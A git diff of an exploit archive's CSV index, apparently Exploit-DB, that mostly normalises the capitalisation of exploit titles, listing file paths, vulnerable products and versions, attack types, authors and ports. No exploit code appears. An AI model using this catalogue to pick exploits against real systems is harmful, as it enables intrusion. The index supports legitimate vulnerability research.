diff --git a/files.csv b/files.csv index c5c2a56d5..bb5b4ab5b 100755 --- a/files.csv +++ b/files.csv @@ -599,7 +599,7 @@ id,file,description,date,author,platform,type,port 772,platforms/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 -775,platforms/linux/remote/775.c,"Berlios gpsd 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947 +775,platforms/linux/remote/775.c,"Berlios GPSD 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 @@ -1629,7 +1629,7 @@ id,file,description,date,author,platform,type,port 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - (templatefolder) Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0 -1918,platforms/php/webapps/1918.php,"bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 +1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0 @@ -2136,7 +2136,7 @@ id,file,description,date,author,platform,type,port 2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 -2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2006-09-27,"H D Moore",windows,remote,0 +2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0 2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps,0 @@ -2462,7 +2462,7 @@ id,file,description,date,author,platform,type,port 2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 -2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 +2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 @@ -4598,7 +4598,7 @@ id,file,description,date,author,platform,type,port 4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps,0 4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 -4952,platforms/php/webapps/4952.txt,"boastMachine 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 +4952,platforms/php/webapps/4952.txt,"BoastMachine 3.1 - 'mail.php' id SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,php,webapps,0 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php Filename) File Disclosure",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion",2008-01-21,QTRinux,php,webapps,0 @@ -5226,7 +5226,7 @@ id,file,description,date,author,platform,type,port 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 -5596,platforms/php/webapps/5596.txt,"BIGACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0 +5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 @@ -6048,7 +6048,7 @@ id,file,description,date,author,platform,type,port 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c' SQL Injection",2008-09-15,JosS,php,webapps,0 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps,0 6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0 -6468,platforms/php/webapps/6468.txt,"attachmax dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 +6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0 6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,multiple,dos,0 @@ -7826,7 +7826,7 @@ id,file,description,date,author,platform,type,port 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0 8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0 8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 -8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (Playlist) Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0 +8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",windows,dos,0 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 @@ -8172,7 +8172,7 @@ id,file,description,date,author,platform,type,port 8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,windows,local,0 8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",windows,local,0 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,windows,local,0 -8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 +8664,platforms/php/webapps/8664.pl,"BigACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 @@ -8539,7 +8539,7 @@ id,file,description,date,author,platform,type,port 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0 -9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 +9052,platforms/php/webapps/9052.txt,"BigACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0 @@ -9225,7 +9225,7 @@ id,file,description,date,author,platform,type,port 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0 9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 -9831,platforms/windows/local/9831.txt,"Avast AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0 +9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0 9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 @@ -9299,7 +9299,7 @@ id,file,description,date,author,platform,type,port 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0 9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 -9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 +9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit) (1)",2002-02-01,"H D Moore",multiple,remote,3632 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 @@ -9317,7 +9317,7 @@ id,file,description,date,author,platform,type,port 9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 -9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 +9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 @@ -9477,7 +9477,7 @@ id,file,description,date,author,platform,type,port 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - (jar50.dll) Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 -10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 +10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 @@ -9495,7 +9495,7 @@ id,file,description,date,author,platform,type,port 10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0 10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 -10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 +10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0 10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload",2009-11-19,daath,php,webapps,80 10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0 @@ -10323,7 +10323,7 @@ id,file,description,date,author,platform,type,port 11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0 -11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0 +11249,platforms/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0 11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0 @@ -11141,7 +11141,7 @@ id,file,description,date,author,platform,type,port 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 12191,platforms/php/webapps/12191.txt,"Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0 -12192,platforms/php/webapps/12192.txt,"blog system 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 +12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps,0 @@ -11375,7 +11375,7 @@ id,file,description,date,author,platform,type,port 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - (Windows x86) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0 12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL Injection / Cross-Site Scripting) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 -12460,platforms/php/webapps/12460.txt,"b2b gold script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 +12460,platforms/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQL Injection",2010-04-30,Sid3^effects,php,webapps,0 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 @@ -11589,7 +11589,7 @@ id,file,description,date,author,platform,type,port 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 -12692,platforms/php/webapps/12692.txt,"TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0 +12692,platforms/php/webapps/12692.txt,"Wordpress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0 12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 @@ -11680,7 +11680,7 @@ id,file,description,date,author,platform,type,port 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0 12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 -12804,platforms/multiple/remote/12804.txt,"Nginx http server 0.6.36 - Directory Traversal",2010-05-30,"cp77fk4r ",multiple,remote,0 +12804,platforms/multiple/remote/12804.txt,"Nginx 0.6.36 - Directory Traversal",2010-05-30,"cp77fk4r ",multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12806,platforms/php/webapps/12806.txt,"CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 @@ -12959,7 +12959,7 @@ id,file,description,date,author,platform,type,port 14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0 14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0 -14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 +14801,platforms/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0 14811,platforms/php/webapps/14811.txt,"Joomla! Component com_remository - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0 14808,platforms/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 @@ -13140,7 +13140,7 @@ id,file,description,date,author,platform,type,port 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0 -15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0 +15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)",2010-09-21,Trancer,windows,remote,0 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0 15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0 15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0 @@ -13338,7 +13338,7 @@ id,file,description,date,author,platform,type,port 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 -15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0 +15320,platforms/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0 15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and SearchString) - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15323,platforms/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0 @@ -14044,7 +14044,7 @@ id,file,description,date,author,platform,type,port 16218,platforms/php/webapps/16218.txt,"WordPress Plugin Z-Vote 1.1 - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0 +16217,platforms/php/webapps/16217.txt,"Bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0 16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0 16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0 16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0 @@ -14081,7 +14081,7 @@ id,file,description,date,author,platform,type,port 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service 